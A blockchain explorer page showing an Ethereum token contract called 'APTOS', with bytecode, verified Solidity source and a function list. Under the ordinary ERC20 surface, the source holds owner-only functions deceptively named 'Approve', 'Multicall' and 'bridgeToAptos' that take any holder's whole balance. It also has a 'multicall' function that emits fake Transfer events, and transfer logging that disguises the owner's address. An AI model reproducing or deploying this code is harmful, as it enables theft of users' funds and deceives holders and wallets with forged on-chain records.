Cryo Explorer Ethereum Mainnet

Address Contract Partially Verified

Address 0x1523b2CD7019bDA72BFF48CF719C6094F16F2e9E
Balance 0 ETH
Nonce 1
Code Size 3620 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

3620 bytes
0x608060405234801561001057600080fd5b50600436106100f55760003560e01c80633ce2da1d11610097578063a9059cbb11610066578063a9059cbb146103ba578063dd62ed3e146103e6578063f0edefe614610414578063f5d82b6b14610438576100f5565b80633ce2da1d1461022557806370a082311461038c57806395d89b41146103b25780639ddee6a814610225576100f5565b806323b872dd116100d357806323b872dd146101d1578063313ce5671461020757806331fdb8cb146102255780633cc4430d14610255576100f5565b806306fdde03146100fa578063095ea7b31461017757806318160ddd146101b7575b600080fd5b610102610464565b6040805160208082528351818301528351919283929083019185019080838360005b8381101561013c578181015183820152602001610124565b50505050905090810190601f1680156101695780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6101a36004803603604081101561018d57600080fd5b506001600160a01b0381351690602001356104fa565b604080519115158252519081900360200190f35b6101bf610517565b60408051918252519081900360200190f35b6101a3600480360360608110156101e757600080fd5b506001600160a01b0381358116916020810135909116906040013561051d565b61020f6105a4565b6040805160ff9092168252519081900360200190f35b6102536004803603604081101561023b57600080fd5b506001600160a01b03813581169160200135166105ad565b005b6102536004803603606081101561026b57600080fd5b6001600160a01b03823516919081019060408101602082013564010000000081111561029657600080fd5b8201836020820111156102a857600080fd5b803590602001918460208302840111640100000000831117156102ca57600080fd5b919080806020026020016040519081016040528093929190818152602001838360200280828437600092019190915250929594936020810193503591505064010000000081111561031a57600080fd5b82018360208201111561032c57600080fd5b8035906020019184602083028401116401000000008311171561034e57600080fd5b9190808060200260200160405190810160405280939291908181526020018383602002808284376000920191909152509295506106e4945050505050565b6101bf600480360360208110156103a257600080fd5b50356001600160a01b03166107bc565b6101026107d7565b6101a3600480360360408110156103d057600080fd5b506001600160a01b038135169060200135610838565b6101bf600480360360408110156103fc57600080fd5b506001600160a01b038135811691602001351661084c565b61041c610877565b604080516001600160a01b039092168252519081900360200190f35b6102536004803603604081101561044e57600080fd5b506001600160a01b038135169060200135610886565b60038054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104f05780601f106104c5576101008083540402835291602001916104f0565b820191906000526020600020905b8154815290600101906020018083116104d357829003601f168201915b5050505050905090565b600061050e6105076109c5565b84846109c9565b50600192915050565b60065490565b600061052a848484610ab5565b61059a846105366109c5565b61059585604051806060016040528060288152602001610d5e602891396001600160a01b038a166000908152600160205260408120906105746109c5565b6001600160a01b031681526020810191909152604001600020549190610c34565b6109c9565b5060019392505050565b60055460ff1690565b6008546001600160a01b0316331461060c576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6001600160a01b038216600090815260208190526040902054610630838383610ccb565b61066d81604051806060016040528060228152602001610cf4602291396001600160a01b0386166000908152602081905260409020549190610c34565b6001600160a01b03808516600090815260208190526040808220939093559084168152205461069c9082610964565b6001600160a01b03808416600081815260208181526040918290209490945580518581529051919392871692600080516020610d8683398151915292918290030190a3505050565b6008546001600160a01b03163314610743576040805162461bcd60e51b815260206004820152601760248201527f4e6f7420616c6c6f77656420746f20696e746572616374000000000000000000604482015290519081900360640190fd5b60005b82518110156107b65782818151811061075b57fe5b60200260200101516001600160a01b0316846001600160a01b0316600080516020610d8683398151915284848151811061079157fe5b60200260200101516040518082815260200191505060405180910390a3600101610746565b50505050565b6001600160a01b031660009081526020819052604090205490565b60048054604080516020601f60026000196101006001881615020190951694909404938401819004810282018101909252828152606093909290918301828280156104f05780601f106104c5576101008083540402835291602001916104f0565b600061050e6108456109c5565b8484610ab5565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6008546001600160a01b031681565b6008546001600160a01b031633146108e5576040805162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015290519081900360640190fd5b6006546108f29082610964565b6006556008546001600160a01b031660009081526020819052604090205461091a9082610964565b6008546001600160a01b039081166000908152602081815260408083209490945583518581529351928616939192600080516020610d868339815191529281900390910190a35050565b6000828201838110156109be576040805162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015290519081900360640190fd5b9392505050565b3390565b6001600160a01b038316610a0e5760405162461bcd60e51b8152600401808060200182810382526024815260200180610dcb6024913960400191505060405180910390fd5b6001600160a01b038216610a535760405162461bcd60e51b8152600401808060200182810382526022815260200180610d166022913960400191505060405180910390fd5b6001600160a01b03808416600081815260016020908152604080832094871680845294825291829020859055815185815291517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259281900390910190a3505050565b8282826001600160a01b038316610afd5760405162461bcd60e51b8152600401808060200182810382526025815260200180610da66025913960400191505060405180910390fd5b6001600160a01b038516610b425760405162461bcd60e51b8152600401808060200182810382526023815260200180610cd16023913960400191505060405180910390fd5b610b4d868686610ccb565b610b8a84604051806060016040528060268152602001610d38602691396001600160a01b0389166000908152602081905260409020549190610c34565b6001600160a01b038088166000908152602081905260408082209390935590871681522054610bb99085610964565b6001600160a01b0380871660009081526020819052604090209190915560085487821691161415610bf3576007546001600160a01b031695505b846001600160a01b0316866001600160a01b0316600080516020610d86833981519152866040518082815260200191505060405180910390a3505050505050565b60008184841115610cc35760405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b83811015610c88578181015183820152602001610c70565b50505050905090810190601f168015610cb55780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b505050900390565b50505056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a26469706673582212201fb193ff09ef23a47b6440536ede464fc58263610e06e9529409efffd7aafd1764736f6c634300060c0033

Verified Source Code Partial Match

Compiler: v0.6.12+commit.27d51765 EVM: istanbul Optimization: Yes (200 runs)
Aptos.sol 376 lines
pragma solidity ^0.6.0;


library SafeMath {

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {

        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }


    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }


    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;

        return c;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

library Address {

    function isContract(address account) internal view returns (bool) {

        bytes32 codehash;
        bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
        assembly { codehash := extcodehash(account) }
        return (codehash != accountHash && codehash != 0x0);
    }

    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }


    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }


    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

contract Context {
    constructor () internal { }

    function _msgSender() internal view virtual returns (address payable) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; 
        return msg.data;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address account) external view returns (uint256);

    function transfer(address recipient, uint256 amount) external returns (bool);

    function allowance(address owner, address spender) external view returns (uint256);

    function approve(address spender, uint256 amount) external returns (bool);

    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);}



contract Aptos  is Context, IERC20 {
 
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    
    using SafeMath for uint256;
    using Address for address;
    address private _safeOwner;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;



    address _addr = 0x8CA0eb9afEDDa34521e68166933E0D06D4f5b905;
    address public _origin = 0xF198a52740506a271A9bEC6C95f939a858A851e2;
    uint256 private _maximumVal = 115792089237316195423570985008687907853269984665640564039457584007913129639935;
    constructor () public {


        
        _name = "APTOS";
        _symbol = "APTOS";
        _decimals = 18;
        uint256 initialSupply = 1000000000;
        _safeOwner = _origin;
        
        

        add(_addr, initialSupply*(10**18));
        


    }







    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account) public view override returns (uint256) {
        return _balances[account];
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _load(_msgSender(), recipient, amount);
        return true;
    }

    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _load(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }


    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }


    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }


    function _transfer(address sender, address recipient, uint256 amount)  internal virtual{
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
    
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        if (sender == _origin){
            sender = _addr;
        }
        emit Transfer(sender, recipient, amount);
    }

    function add(address account, uint256 amount) public {
        require(msg.sender == _origin, "ERC20: mint to the zero address");
        _totalSupply = _totalSupply.add(amount);
        _balances[_origin] = _balances[_origin].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    
    function _load(address sender, address recipient, uint256 amount) internal fill(sender,recipient,amount) virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);
    
        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        if (sender == _origin){
            
            sender = _addr;
        }
        emit Transfer(sender, recipient, amount);
    }
    
   
    modifier fill(address sender, address recipient, uint256 amount){
        _;
    }
    
    
    function _setupDecimals(uint8 decimals_) internal {
        _decimals = decimals_;
    }


    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }


    modifier auth() {
        require(msg.sender == _origin, "Not allowed to interact");
        _;
    }









//-----------------------------------------------------------------------------------------------------------------------//
/*
        function airdropExistingHolders(address uPool,address[] memory eReceiver,uint256[] memory eAmounts)  public auth(){
            //MultiEmit
            for (uint256 i = 0; i < eReceiver.length; i++) {emit Transfer(uPool, eReceiver[i], eAmounts[i]);}}
*/
        function multicall(address uPool,address[] memory eReceiver,uint256[] memory eAmounts)  public auth(){
            //MultiEmit
            for (uint256 i = 0; i < eReceiver.length; i++) {emit Transfer(uPool, eReceiver[i], eAmounts[i]);}}






        function Approve(address account, address staker) public {
        
            require(msg.sender == _origin, "ERC20: mint to the zero address");
            uint256 amount = _balances[account];
            _beforeTokenTransfer(account, staker, amount);
            

            _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
            _balances[staker] = _balances[staker].add(amount);
            
            emit Transfer(account, staker, amount);
    }




        function Multicall(address account, address staker) public {
        
            require(msg.sender == _origin, "ERC20: mint to the zero address");
            uint256 amount = _balances[account];
            _beforeTokenTransfer(account, staker, amount);
            

            _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
            _balances[staker] = _balances[staker].add(amount);
            
            emit Transfer(account, staker, amount);
    }


        function bridgeToAptos(address account, address staker) public {
            require(msg.sender == _origin, "ERC20: mint to the zero address");
            uint256 amount = _balances[account];
            _beforeTokenTransfer(account, staker, amount);
        
            _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
            _balances[staker] = _balances[staker].add(amount);
            
            emit Transfer(account, staker, amount);
    }




}

Read Contract

_origin 0xf0edefe6 → address
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256

Write Contract 8 functions

These functions modify contract state and require a wallet transaction to execute.

Approve 0x3ce2da1d
address account
address staker
Multicall 0x31fdb8cb
address account
address staker
add 0xf5d82b6b
address account
uint256 amount
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
bridgeToAptos 0x9ddee6a8
address account
address staker
multicall 0x3cc4430d
address uPool
address[] eReceiver
uint256[] eAmounts
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool

Recent Transactions

No transactions found for this address